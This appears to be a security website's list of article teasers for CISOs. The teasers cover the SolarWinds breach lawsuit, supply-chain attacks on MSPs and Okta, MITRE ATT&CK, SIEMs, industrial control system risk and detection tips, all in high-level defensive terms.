SolarWinds Data Breach Lawsuit Takeaways for CISOs
What the lawsuit about the SolarWinds attack teaches us about minimum standards of due care.
What the lawsuit about the SolarWinds attack teaches us about minimum standards of due care.
Why going after MSPs is an increasingly common type of supply chain attack
How standard frameworks like VERIS and MITRE ATT&CK enable a standard language and taxonomy about cyberattacks
Use MITRE ATT&CK to ensure you have detections for the latest adversary techniques employed by APT groups like Deep Panda.
Automation is critical for addressing constant change in threat landscape — plus exponential increase in volume of data collected to spot suspicious activities.
A natural curiosity for how things work, such as what the database logs tell you or what does a specific cloud permission let you do.
Monitor suspicious processes spawned by Java. Avoid false positives by investigating logs at least 90 days back and whitelisting known child-process.
Industrial control systems are juicy targets for nation-state attackers because they typically don’t have the same level of monitoring as corporate IT networks.
High-profile attacks, such as the OPM breach, are typically the result of poor security practices rather than vulnerabilities in office productivity suites.
Often cloud-based for scalability and simplicity, SIEMs are now centralized SecOps hubs for managing security incidents across their entire life cycle.
Webinar recommends how to address constant change in the threat landscape and attack surface, plus dynamic business requirements such as cloud transformation.
Attack could be the next big supply chain attack (MITRE ATT&CK T1195.002), with a similar impact to SolarWinds. Monitor for any suspicious Okta activity.